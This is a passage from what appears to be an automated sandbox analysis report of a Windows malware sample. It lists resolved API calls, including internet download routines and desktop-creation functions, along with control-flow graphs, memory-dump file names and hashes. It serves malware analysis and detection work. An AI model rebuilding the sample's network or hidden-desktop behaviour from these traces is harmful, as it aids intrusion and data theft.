                        • GetProcAddress.KERNEL32(77190000,015EE530), ref: 00926A49
                        • GetProcAddress.KERNEL32(77190000,015D51C8), ref: 00926A61
                        • GetProcAddress.KERNEL32(77190000,015EE620), ref: 00926A79
                        • GetProcAddress.KERNEL32(77190000,015D5328), ref: 00926A92
                        • GetProcAddress.KERNEL32(77190000,015EE590), ref: 00926AAA
                        • GetProcAddress.KERNEL32(77190000,015EE698), ref: 00926AC2
                        • GetProcAddress.KERNEL32(77190000,015D5208), ref: 00926ADB
                        • GetProcAddress.KERNEL32(77190000,015D5268), ref: 00926AF3
                        • LoadLibraryA.KERNEL32(015EE5D8,0092051F), ref: 00926B05
                        • LoadLibraryA.KERNEL32(015EE638), ref: 00926B16
                        • LoadLibraryA.KERNEL32(015EE650), ref: 00926B28
                        • LoadLibraryA.KERNEL32(015EE680), ref: 00926B3A
                        • LoadLibraryA.KERNEL32(015EE6B0), ref: 00926B4B
                        • LoadLibraryA.KERNEL32(015EE6E0), ref: 00926B5D
                        • LoadLibraryA.KERNEL32(015EE6F8), ref: 00926B6F
                        • LoadLibraryA.KERNEL32(015EE8A8), ref: 00926B80
                        • GetProcAddress.KERNEL32(77040000,015D52A8), ref: 00926B9C
                        • GetProcAddress.KERNEL32(77040000,015EE7A0), ref: 00926BB4
                        • GetProcAddress.KERNEL32(77040000,015E8BA8), ref: 00926BCD
                        • GetProcAddress.KERNEL32(77040000,015EE7B8), ref: 00926BE5
                        • GetProcAddress.KERNEL32(77040000,015D5288), ref: 00926BFD
                        • GetProcAddress.KERNEL32(70460000,015DA690), ref: 00926C1D
                        • GetProcAddress.KERNEL32(70460000,015D56C8), ref: 00926C35
                        • GetProcAddress.KERNEL32(70460000,015DA550), ref: 00926C4E
                        • GetProcAddress.KERNEL32(70460000,015EE8C0), ref: 00926C66
                        • GetProcAddress.KERNEL32(70460000,015EE8F0), ref: 00926C7E
                        • GetProcAddress.KERNEL32(70460000,015D5548), ref: 00926C97
                        • GetProcAddress.KERNEL32(70460000,015D54A8), ref: 00926CAF
                        • GetProcAddress.KERNEL32(70460000,015EE908), ref: 00926CC7
                        • GetProcAddress.KERNEL32(768D0000,015D5588), ref: 00926CE3
                        • GetProcAddress.KERNEL32(768D0000,015D55E8), ref: 00926CFB
                        • GetProcAddress.KERNEL32(768D0000,015EE8D8), ref: 00926D14
                        • GetProcAddress.KERNEL32(768D0000,015EE7D0), ref: 00926D2C
                        • GetProcAddress.KERNEL32(768D0000,015D53E8), ref: 00926D44
                        • GetProcAddress.KERNEL32(75790000,015DA4B0), ref: 00926D64
                        • GetProcAddress.KERNEL32(75790000,015DA870), ref: 00926D7C
                        • GetProcAddress.KERNEL32(75790000,015EE920), ref: 00926D95
                        • GetProcAddress.KERNEL32(75790000,015D5468), ref: 00926DAD
                        • GetProcAddress.KERNEL32(75790000,015D5728), ref: 00926DC5
                        • GetProcAddress.KERNEL32(75790000,015DA910), ref: 00926DDE
                        • GetProcAddress.KERNEL32(75A10000,015EE7E8), ref: 00926DFE
                        • GetProcAddress.KERNEL32(75A10000,015D5608), ref: 00926E16
                        • GetProcAddress.KERNEL32(75A10000,015E8AC8), ref: 00926E2F
                        • GetProcAddress.KERNEL32(75A10000,015EE938), ref: 00926E47
                        • GetProcAddress.KERNEL32(75A10000,015EE878), ref: 00926E5F
                        • GetProcAddress.KERNEL32(75A10000,015D5488), ref: 00926E78
                        • GetProcAddress.KERNEL32(75A10000,015D55C8), ref: 00926E90
                        • GetProcAddress.KERNEL32(75A10000,015EE788), ref: 00926EA8
                        • GetProcAddress.KERNEL32(75A10000,015EE800), ref: 00926EC1
                        • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 00926ED7
                        • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 00926EEE
                        • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 00926F05
                        • GetProcAddress.KERNEL32(76850000,015D5688), ref: 00926F21
                        • GetProcAddress.KERNEL32(76850000,015EE818), ref: 00926F39
                        • GetProcAddress.KERNEL32(76850000,015EE830), ref: 00926F52
                        • GetProcAddress.KERNEL32(76850000,015EE848), ref: 00926F6A
                        • GetProcAddress.KERNEL32(76850000,015EE860), ref: 00926F82
                        • GetProcAddress.KERNEL32(75690000,015D55A8), ref: 00926F9E
                        • GetProcAddress.KERNEL32(75690000,015D56A8), ref: 00926FB6
                        • GetProcAddress.KERNEL32(769C0000,015D56E8), ref: 00926FD2
                        • GetProcAddress.KERNEL32(769C0000,015EE890), ref: 00926FEA
                        • GetProcAddress.KERNEL32(6F8C0000,015D5708), ref: 0092700A
                        • GetProcAddress.KERNEL32(6F8C0000,015D5388), ref: 00927022
                        • GetProcAddress.KERNEL32(6F8C0000,015D5408), ref: 0092703B
                        • GetProcAddress.KERNEL32(6F8C0000,015EE320), ref: 00927053
                        • GetProcAddress.KERNEL32(6F8C0000,015D5628), ref: 0092706B
                        • GetProcAddress.KERNEL32(6F8C0000,015D5648), ref: 00927084
                        • GetProcAddress.KERNEL32(6F8C0000,015D53A8), ref: 0092709C
                        • GetProcAddress.KERNEL32(6F8C0000,015D5508), ref: 009270B4
                        • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 009270CB
                        • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 009270E2
                        • GetProcAddress.KERNEL32(75D90000,015EE428), ref: 009270FE
                        • GetProcAddress.KERNEL32(75D90000,015E8C78), ref: 00927116
                        • GetProcAddress.KERNEL32(75D90000,015EE188), ref: 0092712F
                        • GetProcAddress.KERNEL32(75D90000,015EE350), ref: 00927147
                        • GetProcAddress.KERNEL32(76470000,015D53C8), ref: 00927163
                        • GetProcAddress.KERNEL32(6EBB0000,015EE1E8), ref: 0092717F
                        • GetProcAddress.KERNEL32(6EBB0000,015D5528), ref: 00927197
                        • GetProcAddress.KERNEL32(6EBB0000,015EE260), ref: 009271B0
                        • GetProcAddress.KERNEL32(6EBB0000,015EE2D8), ref: 009271C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                        • API String ID: 2238633743-3468015613
                        • Opcode ID: e64b9decc879ba05b692d07c3efbc3083ad7a36bdd350961ebc0c1246f1fd870
                        • Instruction ID: 7349c54b0a9833403e74524086615aa96859090ea02668f132fc89fe260ddcd9
                        • Opcode Fuzzy Hash: e64b9decc879ba05b692d07c3efbc3083ad7a36bdd350961ebc0c1246f1fd870
                        • Instruction Fuzzy Hash: 966210B9A11700AFD758DF69ED88A2E37BAF7887413308919F955C3364DFB4A800DB61
                        Function 0091F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(0092CFEC), ref: 0091F1D5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F1F1
                        • lstrlen.KERNEL32(0092CFEC), ref: 0091F1FC
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F215
                        • lstrlen.KERNEL32(0092CFEC), ref: 0091F220
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F239
                        • lstrcpy.KERNEL32(00000000,00934FA0), ref: 0091F25E
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F28C
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F2C0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091F2F0
                        • lstrlen.KERNEL32(015D5248), ref: 0091F315
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: d170d5a99482754089c151cd27abe72917160e8d3c308f84824c243409662241
                        • Instruction ID: 00b5a572946122ce4249de7d4e23c10494d0eee9f48711c14e5b252ffefc2a4d
                        • Opcode Fuzzy Hash: d170d5a99482754089c151cd27abe72917160e8d3c308f84824c243409662241
                        • Instruction Fuzzy Hash: 11A25470A0160D9FCB20DF69D958A9EB7F9AF44314F288479E419EB2A1DB35DC82CF50
                        Function 0091FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920013
                        • lstrlen.KERNEL32(0092CFEC), ref: 009200BD
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009200E1
                        • lstrlen.KERNEL32(0092CFEC), ref: 009200EC
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920110
                        • lstrlen.KERNEL32(0092CFEC), ref: 0092011B
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092013F
                        • lstrlen.KERNEL32(0092CFEC), ref: 0092015A
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920189
                        • lstrlen.KERNEL32(0092CFEC), ref: 00920194
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009201C3
                        • lstrlen.KERNEL32(0092CFEC), ref: 009201CE
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920206
                        • lstrlen.KERNEL32(0092CFEC), ref: 00920250
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00920288
                        • lstrcpy.KERNEL32(00000000,?), ref: 0092059B
                        • lstrlen.KERNEL32(015D5048), ref: 009205AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 009205D7
                        • lstrcat.KERNEL32(00000000,?), ref: 009205E3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092060E
                        • lstrlen.KERNEL32(015EFBE0), ref: 00920625
                        • lstrcpy.KERNEL32(00000000,?), ref: 0092064C
                        • lstrcat.KERNEL32(00000000,?), ref: 00920658
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00920681
                        • lstrlen.KERNEL32(015D5028), ref: 00920698
                        • lstrcpy.KERNEL32(00000000,?), ref: 009206C9
                        • lstrcat.KERNEL32(00000000,?), ref: 009206D5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00920706
                        • lstrcpy.KERNEL32(00000000,015E8C38), ref: 0092074B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901557
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 00901579
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                          • Part of subcall function 00901530: lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0092077F
                        • lstrcpy.KERNEL32(00000000,015EFAC0), ref: 009207E7
                        • lstrcpy.KERNEL32(00000000,015E89F8), ref: 00920858
                        • lstrcpy.KERNEL32(00000000,fplugins), ref: 009208CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00920928
                        • lstrcpy.KERNEL32(00000000,015E88C8), ref: 009209F8
                          • Part of subcall function 009024E0: lstrcpy.KERNEL32(00000000,?), ref: 00902528
                          • Part of subcall function 009024E0: lstrcpy.KERNEL32(00000000,?), ref: 0090254E
                          • Part of subcall function 009024E0: lstrcpy.KERNEL32(00000000,?), ref: 00902577
                        • lstrcpy.KERNEL32(00000000,015E8A98), ref: 00920ACE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00920B81
                        • lstrcpy.KERNEL32(00000000,015E8A98), ref: 00920D58
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID: fplugins
                        • API String ID: 2500673778-38756186
                        • Opcode ID: 503855a7015bb0269b2a214f66cb07485cc2c47327c7f76cb0ed6dbdb5d5f683
                        • Instruction ID: 28ce9194665c111dae3236fdd71713fa0dfb03fef15b693ebb0020522d48ab2f
                        • Opcode Fuzzy Hash: 503855a7015bb0269b2a214f66cb07485cc2c47327c7f76cb0ed6dbdb5d5f683
                        • Instruction Fuzzy Hash: DDE27B70A053518FD734DF29E588B6ABBE4BF88304F58856DE48D8B2A6DB31D845CF42
                        Function 00906C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2234 906c40-906c64 call 902930 2237 906c75-906c97 call 904bc0 2234->2237 2238 906c66-906c6b 2234->2238 2242 906c99 2237->2242 2243 906caa-906cba call 902930 2237->2243 2238->2237 2240 906c6d-906c6f lstrcpy 2238->2240 2240->2237 2244 906ca0-906ca8 2242->2244 2247 906cc8-906cf5 InternetOpenA StrCmpCA 2243->2247 2248 906cbc-906cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 906cf7 2247->2249 2250 906cfa-906cfc 2247->2250 2248->2247 2249->2250 2251 906d02-906d22 InternetConnectA 2250->2251 2252 906ea8-906ebb call 902930 2250->2252 2254 906ea1-906ea2 InternetCloseHandle 2251->2254 2255 906d28-906d5d HttpOpenRequestA 2251->2255 2259 906ec9-906ee0 call 902a20 * 2 2252->2259 2260 906ebd-906ebf 2252->2260 2254->2252 2257 906d63-906d65 2255->2257 2258 906e94-906e9e InternetCloseHandle 2255->2258 2261 906d67-906d77 InternetSetOptionA 2257->2261 2262 906d7d-906dad HttpSendRequestA HttpQueryInfoA 2257->2262 2258->2254 2260->2259 2265 906ec1-906ec3 lstrcpy 2260->2265 2261->2262 2263 906dd4-906de4 call 923d90 2262->2263 2264 906daf-906dd3 call 9271e0 call 902a20 * 2 2262->2264 2263->2264 2275 906de6-906de8 2263->2275 2265->2259 2277 906e8d-906e8e InternetCloseHandle 2275->2277 2278 906dee-906e07 InternetReadFile 2275->2278 2277->2258 2278->2277 2280 906e0d 2278->2280 2282 906e10-906e15 2280->2282 2282->2277 2283 906e17-906e3d call 927310 2282->2283 2286 906e44-906e51 call 902930 2283->2286 2287 906e3f call 902a20 2283->2287 2291 906e61-906e8b call 902a20 InternetReadFile 2286->2291 2292 906e53-906e57 2286->2292 2287->2286 2291->2277 2291->2282 2292->2291 2293 906e59-906e5b lstrcpy 2292->2293 2293->2291
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00906C6F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906CC2
                        • InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 00906CD5
                        • StrCmpCA.SHLWAPI(?,015F0268), ref: 00906CED
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00906D15
                        • HttpOpenRequestA.WININET(00000000,GET,?,015EFB80,00000000,00000000,-00400100,00000000), ref: 00906D50
                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00906D77
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00906D86
                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00906DA5
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00906DFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00906E5B
                        • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00906E7D
                        • InternetCloseHandle.WININET(00000000), ref: 00906E8E
                        • InternetCloseHandle.WININET(?), ref: 00906E98
                        • InternetCloseHandle.WININET(00000000), ref: 00906EA2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00906EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                        • String ID: ERROR$GET
                        • API String ID: 3687753495-3591763792
                        • Opcode ID: 6d03158dd3fecc71fc91f9becb4bd1afdd7323f08b547c452650de43fe0710a7
                        • Instruction ID: 36be22f88420def261b948a4001d092f1de17d1babf96589fb5cbe24711720d2
                        • Opcode Fuzzy Hash: 6d03158dd3fecc71fc91f9becb4bd1afdd7323f08b547c452650de43fe0710a7
                        • Instruction Fuzzy Hash: 18817C76A41315AFEB20DFA4DC89FAEB7B8AF44700F144468F945E72C0DB70AD558B90
                        Function 0091F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(015D5248), ref: 0091F315
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F3A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F3C7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F47B
                        • lstrcpy.KERNEL32(00000000,015D5248), ref: 0091F4BB
                        • lstrcpy.KERNEL32(00000000,015E8B88), ref: 0091F4EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F59E
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0091F61C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F64C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F69A
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0091F718
                        • lstrlen.KERNEL32(015E8C28), ref: 0091F746
                        • lstrcpy.KERNEL32(00000000,015E8C28), ref: 0091F771
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091F793
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091F7E4
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0091FA32
                        • lstrlen.KERNEL32(015E8C68), ref: 0091FA60
                        • lstrcpy.KERNEL32(00000000,015E8C68), ref: 0091FA8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091FAAD
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091FAFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: bc97bf1c9fdc2158746ad84cc3a6574cf7f46c270dc585a18f1626e1da101168
                        • Instruction ID: 529cf1689491f81e7efe8b5ad77c009240baf76305f98b5e0cd8ae19c8ce6409
                        • Opcode Fuzzy Hash: bc97bf1c9fdc2158746ad84cc3a6574cf7f46c270dc585a18f1626e1da101168
                        • Instruction Fuzzy Hash: 85F13F70B01609DFCB24CF69D968A99B7E9BF44314B2881BDD419AB2A1DB75DC82CF40
                        Function 00918CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2721 918ca0-918cc4 StrCmpCA 2722 918cc6-918cc7 ExitProcess 2721->2722 2723 918ccd-918ce6 2721->2723 2725 918ee2-918eef call 902a20 2723->2725 2726 918cec-918cf1 2723->2726 2727 918cf6-918cf9 2726->2727 2729 918ec3-918edc 2727->2729 2730 918cff 2727->2730 2729->2725 2766 918cf3 2729->2766 2732 918d30-918d3f lstrlen 2730->2732 2733 918e56-918e64 StrCmpCA 2730->2733 2734 918d5a-918d69 lstrlen 2730->2734 2735 918dbd-918dcb StrCmpCA 2730->2735 2736 918ddd-918deb StrCmpCA 2730->2736 2737 918dfd-918e0b StrCmpCA 2730->2737 2738 918e1d-918e2b StrCmpCA 2730->2738 2739 918e3d-918e4b StrCmpCA 2730->2739 2740 918d84-918d92 StrCmpCA 2730->2740 2741 918da4-918db8 StrCmpCA 2730->2741 2742 918d06-918d15 lstrlen 2730->2742 2743 918e88-918e9a lstrlen 2730->2743 2744 918e6f-918e7d StrCmpCA 2730->2744 2760 918d41-918d46 call 902a20 2732->2760 2761 918d49-918d55 call 902930 2732->2761 2733->2729 2756 918e66-918e6d 2733->2756 2745 918d73-918d7f call 902930 2734->2745 2746 918d6b-918d70 call 902a20 2734->2746 2735->2729 2749 918dd1-918dd8 2735->2749 2736->2729 2750 918df1-918df8 2736->2750 2737->2729 2751 918e11-918e18 2737->2751 2738->2729 2752 918e31-918e38 2738->2752 2739->2729 2753 918e4d-918e54 2739->2753 2740->2729 2748 918d98-918d9f 2740->2748 2741->2729 2754 918d17-918d1c 